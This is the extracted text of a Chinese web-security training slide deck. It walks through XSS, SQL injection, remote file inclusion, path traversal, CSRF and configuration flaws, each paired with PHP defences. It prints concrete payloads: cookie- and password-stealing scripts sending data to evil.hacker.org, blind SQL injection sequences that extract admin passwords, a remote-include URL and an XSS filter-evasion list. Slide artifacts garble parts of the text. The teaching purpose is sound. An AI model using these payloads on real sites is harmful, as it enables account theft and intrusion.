SlideShare ist ein Scribd-Unternehmen logo

Web安全解决方案V1.0

X
xuanliang
Technologie
1 von 127
Penetration test Software developer Security analyst Security consultation Whatever
跨站攻击 注入攻击 远程文件执行 CSRF 攻击 访问控制缺陷 配置错误 数据存储不安全 直接对象参考不安全 认证和会话管理不完善 通信不安全
入侵技术交流 防御 XSS
 
1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户点击主题 4. 数据传送给互联网用户 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 攻击者、弱点网站、互联网用户的 互动游戏 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... cookies Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... phishing username/password Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... spoofed Server Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶 中国队 ..... botnet Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
<?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=Wong_Bin <HTML> <Body> Welcome Wong_Bin </Body> </HTML>
<?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=<script>alert(&quot;XSS&quot;)</script> <HTML> <Body> Welcome <script>alert(&quot;XSS&quot;)</script> </Body> </HTML>
<Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update...&quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> [email_address] Update your email address 确定
<Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update...&quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> huangbin@nsfocus.com<script>document.location ='http://evil.hacker.org/steal_cookies.php?cookies=‘%20+encodeURI(document.cookie);</script> http://evil.hacker.org. Steal Cookes!!! Update your email address 确定
姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> <HTML> 欢迎来到奥运论坛! 用户名: 密 码: </HTML> 刘翔… ..... 郑智… ..... 郭晶晶 ..... 中国队 ..... User_information.txt 记录用户名和密码 奥运论坛 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 输入用户名、密码。登陆……
… <body background=javascript:evil=document.createElement(&quot;script&quot;);evil.src=&quot;http://evil.hack.org/xss.js&quot;;document.body.appendChild(evil);> … <SCRIPT language=JavaScript> function Phishing() { evil_code = Make a Phishing Page by … document.write(evil_code); } Phishing() </SCRIPT> ... <form>action=&quot;user_infomation.php&quot; method=&quot;post&quot; onsubmit=&quot;evilImg=new Image; evil.src='http://evil.hacker.org/'+document.forms(1).login.value'+':'+ document.forms(1).password.value;&quot;</form> ... <?php if (isset($_POST['username']) && isset($_POST['password'])) { $filename = &quot;/www/user_information.txt&quot;; $file = @fopen($file_path, &quot;a&quot;); $info = &quot;user: &quot;.$_POST['username'].&quot; passwd:&quot;.$_POST['password'].&quot;&quot;; @fwrite($file, $info); @fclose($file); } ?> Phish Attacker Client 请重新登陆 用户: 密码: 确定 取消
<INPUT TYPE=&quot;image&quot; SRC=&quot;http://example&quot;><script>alert('xss')</script> <INPUT TYPE=&quot;image&quot; SRC=&quot;http://example&quot;> ,[object Object],[object Object]
[object Object],replace(str,&quot;<&quot;,&quot;&lt;&quot;) replace(str,&quot;>&quot;,&quot;&gt;&quot;) ‘ <script.*>’ ,[object Object]
<INPUT TYPE=&quot;image&quot; SRC=javascript:alert(&quot;xss&quot;) > ,[object Object],Dim re     Set re=new RegExp     re.IgnoreCase =True     re.Global=True re.Pattern=&quot;javascript:&quot;     Str = re.replace(Str,&quot;javascript : &quot;)     re.Pattern=&quot;jscript:&quot;    Str = re.replace(Str,&quot;jscript : &quot;)     re.Pattern=&quot;vbscript:&quot;    Str = re.replace(Str,&quot;vbscript : &quot;) set re=nothing ,[object Object],[object Object],javascript:
<INPUT TYPE=&quot;image&quot; SRC=javascript&#58alert(&quot;xss&quot;)> ,[object Object],[object Object],‘ & ’ replace(str,&quot;&&quot;,&quot;&amp;&quot;) ,[object Object]
<img src=&quot;javas cript:alert('xss')&quot;> ,[object Object],[object Object],replace(str,“ ”,“&nbsp; “) ,[object Object]
http://example/weak.php?username=%3A%69%6E%70%75%74%21%74%79%70%65%3D%68%69%64%64%65%6E%20%76%61%6C%75%65%3D%47%6F%74%63%68%61%21%20%6E%61%6D%66%20%3D%20%78%3E%20%3C%73%63%71%69%71%74%3E%20%61%6C%65%72%71%28%78%2C%76%61%6C%75%65%29%27%3C%2F%73%63%72%69%70%74%3E%4A%69%6C http://example/weak.php?username=<input type=hidden value=v name = x> <script>alert(x.value)</script>Wrong ,[object Object]
function safe_html($msg) { $msg = str_replace('&amp;','&',$msg); $msg = str_replace('&nbsp;',' ',$msg); $msg = str_replace('&quot;','&quot;',$msg); $msg = str_replace(&quot;'&quot;,'&#39;',$msg); $msg = str_replace(&quot;<&quot;,&quot;&lt;&quot;,$msg); $msg = str_replace(&quot;>&quot;,&quot;&gt;&quot;,$msg); $msg = str_replace(&quot;&quot;,&quot; &nbsp; &nbsp;&quot;,$msg); $msg = str_replace(&quot;&quot;,&quot;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot; &nbsp; &quot;,$msg); return $msg; } Danger input Encoding input
<img src=&quot;#&quot; onerror=alert(/xss/)> ,[object Object],<img src=&quot;#&quot; style=“evil:expression(alert(/xss/));&quot;> <img src=&quot;#&quot;/**/onerror=alert(/xss/) > ,[object Object],[object Object]
HTML 表单 WEB 程序 数据库 WEB 程序 浏览器    
HTML 表单 WEB 程序 数据库 WEB 程序 浏览器  replace(str, safer, danger) …… …… ,[object Object],Htmlspecialchars ($html, ENT_QUOTES) …… ,[object Object],FireFox no script …… …… ,[object Object]
[object Object],[object Object]
POST / thepage.jsp?var1=page1.html HTTP/1.1 Accept: */* Referer: http:// www.myweb.com/index.html Accept-Language: en-us,de;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-url-encoded Content-Lenght: 59 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www. myweb.com Connection: Keep-Alive uid=fred&password=secret&pagestyle=default.css&action=login ,[object Object]
‘ <script.*>’ <table background=javascript:evil()> <tr background=javascript:evil()> <body background=javascript:evil()>
<input type='image' src=javascript:evil()> <img src='javascript:evil()’> <frameset> <frame src=&quot;javascript:danger()&quot;>...
<link rel=&quot;stylesheet” href=javascript:evil()> <base href=javascript:evil()>
<meta http-equiv=&quot;refresh“ content=&quot;0;url=javascript:danger()&quot;> <p style='background-image: url(&quot;javascript:danger();&quot;)'); <a href='javascript:danger();'>
<body onload='danger();'> <div onmouseover='danger();'> <div onscroll='danger();'>
<div onmouseenter='danger();'>
<object type=&quot;text/x-scriptlet“ data=&quot;evil.com/danger.js&quot;> <style>@import evil.com/danger.js</style> <div style=&quot;width:expression(danger();)&quot;>
[IE] <div style=&quot;behaviour: url( [link to code] );&quot;> [Mozilla] <div style=&quot;binding: url( [link to code] );&quot;> [IE] <div style=&quot;width: expression( [code] );&quot;> [N4] <style type= &quot;text/javascript&quot;>[code] </style> [IE] <object classid=&quot;clsid:...&quot; codebase=&quot;javascript:[code]&quot; > <style><!--</style> <script>[code]//--></script> <![CDATA[<!--]]> <script>[code]//--></script> <!-- -- --> <script>[code]</script> <!-- -- --> < <script>[code]</script> <img src=&quot;blah&quot;onmouseover=&quot; [code] &quot;> <img src=&quot;blah>&quot; onmouseover=&quot; [code] &quot;> <xml src=&quot; javascript:[code] &quot;> <xml d=&quot;X&quot;><a><b> &lt;script>[code]&lt;/script> ; </b></a> </xml> <div datafld=&quot;b&quot; dataformatas=&quot;html&quot; datasrc=&quot; #X &quot;></div> [UTF-8; IE, Opera] [C0][BC]script>[code][C0][BC]/script> <a href=&quot; javas&#99;ript&#35;[code] &quot;> <div onmouseover=&quot; [code] &quot;> <img src=&quot; javascript:[code] &quot;> [IE] <img dynsrc=&quot; javascript:[code] &quot;> [IE] <input type=&quot;image&quot; dynsrc=&quot; javascript:[code] &quot;> [IE] <bgsound src=&quot; javascript:[code] &quot;> & <script>[code]</script> [N4] &{ [code] }; [N4] <img src=&{ [code] };> <link rel=&quot;stylesheet&quot; href=&quot; javascript:[code] &quot;> [IE] <iframe src=&quot; vbscript:[code] &quot;> [ N4] <img src=&quot; mocha:[code] &quot;> [N4] <img src=&quot; livescript:[code] &quot;> < a href=&quot;about: <s&#99;ript>[code]</script> &quot;> <meta http-equiv=&quot;refresh&quot; content=&quot;0;url= javascript:[code] &quot;> <body onload=&quot; [code] &quot;> <div style=&quot;background-image: url( javascript:[code] );&quot;>
Htmlspecialchars() Htmlspecialchars() Strip_tags() $str = strip_tags($_POST['message'], '<b><p><i><u>'); $str = htmlentities($str); echo nl2br($str);
<?php $html = '<p><i><s>Welcome to Nsfocus!</i></p></s>'; print strip_tags($html); print ‘’; // Allow <p><i><s> print strip_tags($html, '<p><i><s>'); ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; print strip_tags($html); print &quot;&quot;; // Allow <script> print strip_tags($html, '<script>'); ?> Welcome to Nsfocus! alert(&quot;xss attack!!&quot;)
<?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $html.&quot;&quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $new_html.&quot;&quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
<?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $html.&quot;&quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlentities($html, ENT_QUOTES,’UTF-8’); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $new_html.&quot;&quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
$_FILES['message'] $_GET['message'] $_REQUEST['message'] $_POST['message'] $HTTP_GET_VARS['message'] More… $_COOKIE['message'] $_ENV['message'] $_SESSION['message'] $_SERVER['message']
 
入侵技术交流 防御 SQL Injection
 
... <form action = &quot;login.php&quot; method = &quot;post&quot; name = &quot;login&quot;> 用户 :<input type = &quot;text&quot; name = &quot;username&quot; value = &quot;&quot; maxlength = &quot;20&quot;> 密码 :<input type = &quot;password&quot; name = “password&quot; value = &quot;&quot; maxlength = &quot;20&quot;> <INPUT TYPE=submit name = &quot;confirm&quot; value = &quot; 确定 &quot;> <INPUT TYPE=reset name = &quot;cancel&quot; value = &quot; 取消 &quot;> </form> ... <?php $query= &quot;select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ”; $db_query = mysql_db_query($dbname, $query); $db_resutl = mysql_fetch_array($db_query); if ($db_resutl) { print &quot;Success in...&quot;; } ?> ,[object Object],select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ,[object Object],用户: 密码: 确定 取消
select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ admin select * from user where username=‘admin’ and password=‘’ or ‘’=‘’ Success in… ‘ or’’=‘ 用户: 密码: 确定 取消
select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ‘ ;Delete from users;/* select * from user where username=‘‘;Delete from users;/*… Success in… ,[object Object],用户: 密码: 确定 取消
<Font size=5>Search page</font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/Search.php&quot;> <input type=&quot;text&quot; name=&quot;name&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </form> <?php $search_name = $_GET['search_name']; $ query = &quot;select * from user where username like ‘ %$search_name% ’ order by id desc&quot;; $db_query = mysql_db_query($dbname,$ query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print &quot;Search result...&quot;; } ?> ,[object Object],select * from user where username like ‘ %$search_name %‘ order by id desc ,[object Object],Search page: 确定
select * from user where username like ‘%$search_name%‘ order by id desc select * from user where username like ‘%%‘ order by id #%’order by id desc All username show… %' order by id# Search page: 确定
<Font size=5>Update your password</font> <form name=&quot;update&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;password&quot; size=20> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </form> <?php $passwd = $_GET[‘password ‘]; $query = “update user set passwd='$passwd' where uid='$uid'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success in update...&quot;; } ?> ,[object Object],update user set passwd='$passwd' where uid='$uid' ,[object Object],Update your password: 确定
update user set passwd='$passwd' where uid='$uid' update user set passwd=‘123’ where uid =‘1’/*where uid =‘252’ Uid1 password chang Update your password: 123’ where uid = ‘1’/* 确定
Get /query.php?name=Wong ' Get /query.php?name=Wong’ and LEFT(password,1)=‘i Web Server … ,[object Object],[object Object],Attacker FALSE FALSE
Attacker Web Server Post /attacktarget?errors=Y&debug=5 Show more … Get /query.php?user=joe’ Error message: $debug = 1 …
show_source() highlight_string() highlight_file() Other Show error message function… ,[object Object],error_reporting() Php.ini ------- display_errors = off ,[object Object]
1. 判断注入点 MSSQL SERVER!! Get /query.asp?name=Wong ' Get /query.asp?name=Wong and 1=1 Get /query.asp?name=Wong and 1=2 Web Server Attacker FALSE TRUE FALSE
Get /query.asp?name= Wong and (select count(*) from admin)>=0 Get /query.asp?name= Wong and (select count(user) from admin)>=0 Get /query.asp?name= Wong and (select count(username) from admin)>=0 … 1. 判断注入点 2. 探测数据库结构 MYSQLSERVER!! 表名 admin 字段 username.. Attacker Web Server TRUE FALSE TRUE
Get /query.asp?name= Wong and (select top 1 len(username) from admin)>5 Get /query.asp?name= Wong and (select top 1 len(username) from admin)<10 Get /query.asp?name= Wong and (select top 1 len(username) from admin)=8 … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 Attacker Web Server TRUE TRUE TRUE
Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)='a') Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 用户名: admin 密码 : jjyy@!&1 4. 探测用户名和密码 Attacker Web Server TRUE FALSE
1. 判断注入点 MYSQL SERVER!! Get /query.php?name=joe’ Get /query.php?name=joe’ and 1=1 Get /query.php?name=joe’ and 1=2 Web Server Attacker FALSE TRUE FALSE
Get /query.php?name= joe’ and LENGTH(password)>‘5 Get /query.php?name= joe’ and LENGTH(password)<‘15 Get /query.php?name= joe’ and LENGTH(password) =‘13 … 1. 判断注入点 2. 探测密码长度 MYSQLSERVER!! 密码长 13 位 Attacker Web Server TRUE TRUE TRUE
Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
Get /query.php?name= joe’ union select 1,1,1,1,1 from root_user/* Get /query.php?name= admin’ union select 1,1,1,1,1 from admin_user/* … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 Attacker Web Server FALSE TRUE
Get /query.php?name= joe’and 1<>1 union select 1,1,name,1,1,passwd,1 from admin_user /* 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 用户名: admin 密码 : fly_you ! @# 5. 拿到用户名和密码 Attacker Web Server TRUE
Get /query.php?name= -1’ union select 1,1,1,1,load_file('c:/boot.ini') C lient Web Server C:oot.ini
合法 数据长度检测 数据类型检测 数据字符检测 合法 合法 否 合法 出错提示 否 否
客户端检查、过滤 合法 错误提示 错误提示 服务器响应 服务端检查、过滤 合法 处理提交信息 攻击备案 ,[object Object],[object Object],绕过客户端检查 否 是 是 否 客户端 服务端
< > & ‘ “ + ; {Whitespace} % / # Danger !
addslashes mysql_real_escape_strin PDO escapeshellarg escapeshellcmd magic_quotes_gpc register_globals safe_mode allow_url_fopen open_basedir disable_functions 注:解决方案少了,需要更多的时间去完成… …
入侵技术交流 防御 恶意文件执行
 
Web Server Attacker Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin. ...
<?php include($_GET['file'].&quot;.php&quot;); ?> <?php print file_get_contents('/etc/passwd'); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt
<?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?php var_dump(get_defined_vars()); die(); ?>
<?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?php print &quot;Guess user & password demo&quot;; include('http://evil.hacker.org/userGuesses.php'); foreach($userGuesses as $user => $password) { $connection = @mysql_connect('localhost', $user, $password); if ($connection) { print &quot;Success with username: $user. Using password: $password&quot;; } } ?>
[object Object],allow_url_fopen allow_url_include($file) ,[object Object],<?php include($_GET['file'].&quot;.php&quot;); ?> <?php $page = array( 'contact' => 'contact.php', 'help' => 'help.php', 'query' => 'query.php'); if (array_key_exists($_GET['file'], $page)) { include('/full/path/'.$page[$_GET['file']]); } ?> ,[object Object]
Attacker Web Server Get /del.php?user=../etc&file=passwd Del /etc/passwd success Post file=passwd Success Post…
<?php // 从用户目录中删除指定的文件 $username = $_GET['user']; $homedir = &quot;/home/$username&quot;; $file_to_delete = &quot;$userfile&quot;; unlink (&quot;$homedir/$userfile&quot;); echo &quot;$file_to_delete has been deleted!&quot;; ?> <?php // 删除硬盘中任何 PHP 有访问权限的文件 $ file_to_delete = $_GET[‘file’]; $username = &quot;../etc/&quot;; $homedir = &quot;/home/../etc/&quot;; $file_to_delete = &quot;passwd&quot;; unlink (&quot;/home/../etc/passwd&quot;); echo &quot;/home/../etc/passwd has been deleted!&quot;; ?> Get /del.php?user=../etc&file=passwd
[object Object],[object Object],<?php $username = $_SERVER['REMOTE_USER']; // 使用认证机制 $homedir = &quot;/home/$username&quot;; $file_to_delete = basename(&quot;$userfile&quot;); // 去除变量中的路径 unlink ($homedir/$file_to_delete); $fp = fopen(&quot;/home/logging/filedelete.log&quot;,&quot;+a&quot;); // 记录删除动作 $logstring = &quot;$username $homedir $file_to_delete&quot;; fwrite ($fp, $logstring); fclose($fp); echo &quot;$file_to_delete has been deleted!&quot;; ?> <?php $username = $_SERVER['REMOTE_USER']; // 使用认证机制 $homedir = &quot;/home/$username&quot;; if (!ereg('^[^./][^/]*$', $userfile)) die('bad filename'); // 停止执行代码 if (!ereg('^[^./][^/]*$', $username)) die('bad username'); // 停止执行代码 ?>
[object Object],只给 PHP 的 web 用户很有限的权限!
<?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject, $message, $from ); ?> To: [email_address] Subject: the subject From: [email_address] POST [email_address]
<?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject, $message, $from ); ?> To: [email_address] Subject: the subject From: [email_address] Bcc: [email_address] Reply-To: [email_address] … POST fake@example.orgBcc:evil@example.comReply-To:evil2@example.com
<?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; if (! ctype_print ($headers)) { print &quot;Error post&quot;; } else mail($to, $subject, $message, $from ); ?> ,[object Object],<?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; if (! ctype_print ($headers)) { write_logs(IP MESSAGE); print “U IP has been log…&quot;; } else mail($to, $subject, $message, $from ); ?> ,[object Object]
入侵技术交流 防御 CSRF
 
1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户访问网站 4. 互联网用户点击主题 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 192.168.1.10 6. 执行危险的操作 cookies 信任域 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 login Webpage+cookies evil
Attacker Myspace ,[object Object],Cool ! Post <script.*> 、 onclick, 、 <a href=javascript://> … False ,[object Object],False ,[object Object],False ,[object Object],Cool!!!Hello,web worm!
入侵技术交流 防御 配置错误
Web Server Attacker Get /config/horde.php.bak ... $conf['prefs']['driver'] = 'sql'; $conf['prefs']['params'] = array(); $conf['prefs']['params']['phptype'] = 'mysql'; $conf['prefs']['params']['hostspec'] = 'foo.bar'; $conf['prefs']['params']['username'] = 'root'; $conf['prefs']['params']['password'] = 'blabla'; $conf['prefs']['params']['database'] = 'horde'; $conf['prefs']['params']['table'] = 'horde_prefs'; ...
[object Object]
[object Object]
php.ini register_globals: Off allow_url_fopen: Off magic_quotes_gpc: Off magic_quotes_runtime: Off safe_mode: On open_basedir: On displays_errors = off log_errors = on error_log = /var/log/php.log register_globals = off session.use_trans_sid = 0 open_basedir = /servers/www/foo.bar/ expose_php = off Must
入侵技术交流 防御 身份认证漏洞
Attacker Web Server Post wrong username or passwd 用户名或密码错误 Get /login.php 用户: 密码: 确定 取消 Get /script.php?authorized=1 Success login in…
<?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } ... ?> <?php $_SESSION['authenticated'] = false; if (authenticate_user()) { $_SESSION['authenticated'] = true; } if (!$_SESSION['authenticated']) { die(&quot;Authorization required&quot;); } ... ?> ,[object Object],[object Object]
[object Object],[object Object],<?php $_SESSION['authenticated'] = false; if (authenticate_user()) { $_SESSION['authenticated'] = true; } if (!$_SESSION['authenticated']) { mail(&quot;admin@example.com&quot;, &quot;Possible breakin attempt&quot;, $_SERVER['REMOTE_ADDR']); echo &quot;Security violation, Admin has been alerted.&quot;; exit; } ... ?> register_globals = off error_reporting(E_ALL); ,[object Object]
<?php if (!isset($_SESSION['session_id'])) { $_SESSION['session_id'] = 1; } else { $_SESSION['session_id']++; } print “we can guest it” ?> ,[object Object],[object Object],<?php Session_start(); if (!isset($_SESSION['session_id'])) { $_SESSION['session_id'] = 1; } else { session_regenerate_id (); } print “we can guest it” ?>
入侵技术交流 防御 存储缺陷
Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(password,1,1)='a') Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(password,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名和密码长度 3. 探测用户名和密码长度 密码是 admin@#$%! 4. 探测密码 Attacker Web Server TRUE FALSE
Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)=‘1') Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名和密码长度 3. 探测用户名和密码长度 HASH 值 120a1b2649c88aef29edd2ffd7359d73 4. 探测密码 Attacker Web Server TRUE FALSE
Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin admin@#$%! …
Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin 120a1b2649c88aef29edd2ffd7359d73 …
admin@#$%! 0x120a1b2649c88aef29edd2ffd7359d73 ,[object Object],[object Object]
<?php // 存储密码散列 $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> ,[object Object]
md5(uniqid(rand(), true)) ,[object Object],md5(uniqid(rand()) ,[object Object]
Php.ini session.save_path ,[object Object]
攻击技术交流 防御 HTTP 数据传输
Post Forum Message: 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
Attacker 登陆成功,欢迎 aa… 登陆论坛 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa… 登陆论坛 用户名 : aa 密 码 : aa_passwd
Attacker qfw2k3vkei5vinev C lient Web Server faj2fk42iio 9fj1kjfajffj fkajlkfiefi2hffkfkff WAP 登陆论坛 用户名 : aa 密 码 : aa_passwd 登陆成功,欢迎 aa…
Post Forum Message: 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
C lient Web Server Client Arp 病毒 登陆论坛 用户名 : aa 密 码 : aa_passwd <script> evil code </script> 登陆论坛 用户名 : aa 密 码 : aa_passwd
Evil Attacked! C lient Web Server 登陆成功,欢迎 aa… <script>evil code</script> 登陆成功,欢迎 aa… Client Arp 病毒
入侵技术交流 防御 访问控制缺陷
Get /afalkjfla/admin123.php C lient Web Server 登陆管理界面成功,欢迎 admin 回家…
Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 4. 寻找后台登陆页面 Attacker Web Server FALSE TRUE FALSE
入侵技术交流 防御 WEB2.0 时代
用户客户端 WEB 服务端 数据库 HTML+CSS HTTP REQ Ajax WEB 或者 XML 服务端 数据库 XML HTTP REQ 浏览器 服务端 用户客户端 HTML+CSS JavaScript 浏览器 服务端 ,[object Object],[object Object]
<cross-domain-policy> <allow-access-from domain=&quot;*&quot;/> </cross-domain-policy> Open API Vulnerable
攻 防
